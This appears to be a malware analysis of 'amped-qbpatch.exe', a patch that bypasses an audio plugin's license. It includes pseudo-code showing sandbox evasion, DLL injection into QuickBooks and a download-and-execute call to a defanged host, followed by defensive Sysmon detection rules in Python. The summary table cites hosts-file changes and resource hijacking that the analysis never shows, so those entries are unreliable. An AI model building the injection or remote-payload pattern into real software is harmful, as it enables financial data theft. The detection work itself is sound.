Executed in a Windows 10 x64 sandbox (no Internet).
Entry point analysis shows the following pseudo-code flow for amped-qbpatch.exe:

```c
if (check_sandbox()) {
    self_delete();
    exit(0);
}
if (find_quickbooks_process())
    inject_qbpatch32_dll();        // hooks QuickBooks file I/O
download_and_execute("http://update.ample[.]com/patch/qb/latest.bin");
install_persistence();
if (find_ample_sound_process())
    patch_memory_bypass_license();
```
The function patch_memory_bypass_license writes a known byte pattern into the memory space of AmpleVST.dll: classic crack behavior.

The function inject_qbpatch32_dll creates a thread in QBW32.exe (the QuickBooks process) via CreateRemoteThread, the standard DLL-injection pattern, most likely to intercept financial data. ATT&CK: T1055 (Process Injection); the CreateRemoteThread DLL-load variant is sub-technique T1055.001 (Dynamic-link Library Injection).
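The two behaviours above that are most useful for detection are the cross-process thread into QBW32.exe and the lookup of the hard-coded download host from the pseudo-code. The following is an added example written for this page, not code from the sandbox or from the analysed binary: it runs two simple rules over Sysmon-style events (Event ID 8 for CreateRemoteThread, Event ID 22 for DNS queries). The event dicts, file paths and the assumption that nothing other than QuickBooks itself legitimately creates threads in QBW32.exe are all constructed for illustration; the domain is the report's defanged update.ample[.]com re-fanged for matching.

```python
"""Detection rules for the amped-qbpatch.exe behaviours described above.
Added example; events below are constructed, not real sandbox telemetry."""

import ntpath
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional

QB_IMAGE = "qbw32.exe"
# Report gives the host defanged as update.ample[.]com; re-fanged here for matching.
DOWNLOAD_HOST = "update.ample.com"


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str   # ATT&CK technique id
    evidence: str


def _basename(path: str) -> str:
    """Case-insensitive Windows basename (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def detect_remote_thread(ev: dict) -> Optional[Alert]:
    """Sysmon EID 8: a thread created inside QBW32.exe by some other image.
    Assumption: on a clean host only QuickBooks' own process touches QBW32.exe."""
    if ev.get("EventID") != 8:
        return None
    src = _basename(ev.get("SourceImage", ""))
    dst = _basename(ev.get("TargetImage", ""))
    if dst == QB_IMAGE and src != QB_IMAGE:
        return Alert("remote_thread_into_quickbooks", "T1055.001",
                     f"{ev['SourceImage']} -> {ev['TargetImage']}")
    return None


def detect_download_host_lookup(ev: dict) -> Optional[Alert]:
    """Sysmon EID 22: DNS query for the hard-coded download host or a subdomain."""
    if ev.get("EventID") != 22:
        return None
    name = ev.get("QueryName", "").lower().rstrip(".")
    if name == DOWNLOAD_HOST or name.endswith("." + DOWNLOAD_HOST):
        return Alert("download_host_lookup", "T1568",
                     f"{ev.get('Image', '?')} queried {name}")
    return None


RULES: List[Callable[[dict], Optional[Alert]]] = [
    detect_remote_thread,
    detect_download_host_lookup,
]


def scan(events: Iterable[dict]) -> List[Alert]:
    """Run every rule over every event; order of alerts follows event order."""
    alerts: List[Alert] = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is not None:
                alerts.append(hit)
    return alerts


# Constructed sample events (paths and benign entries are illustrative only).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\bob\Downloads\amped-qbpatch.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\Downloads\amped-qbpatch.exe",
     "TargetImage": r"C:\Program Files\Intuit\QuickBooks\QBW32.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\chrome.exe"},
    {"EventID": 22, "Image": r"C:\Users\bob\Downloads\amped-qbpatch.exe",
     "QueryName": "update.ample.com"},
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "QueryName": "example.com"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.rule}: {a.evidence}")
```

The remote-thread rule deliberately ignores the source path and keys only on the target, so a renamed or relocated dropper still fires; the DNS rule matches subdomains as well, since a second-stage fetch may use a different label under the same zone. Neither rule covers install_persistence or the AmpleVST.dll memory patch, because the page does not give the persistence mechanism or the byte pattern.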
| Category | Assessment |
|----------|------------|
| Confidence malicious | High |
| Potential impact | Financial data theft (via QuickBooks hook), license bypass, system persistence, further payload download. |
| False positive possibility | Very low: legitimate audio patches don't inject into QuickBooks or modify hosts files. |
| MITRE ATT&CK mapping | T1059 (Command & Scripting), T1055 (Process Injection), T1547 (Boot/Logon Autostart), T1568 (Dynamic Resolution), T1496 (Resource Hijacking). |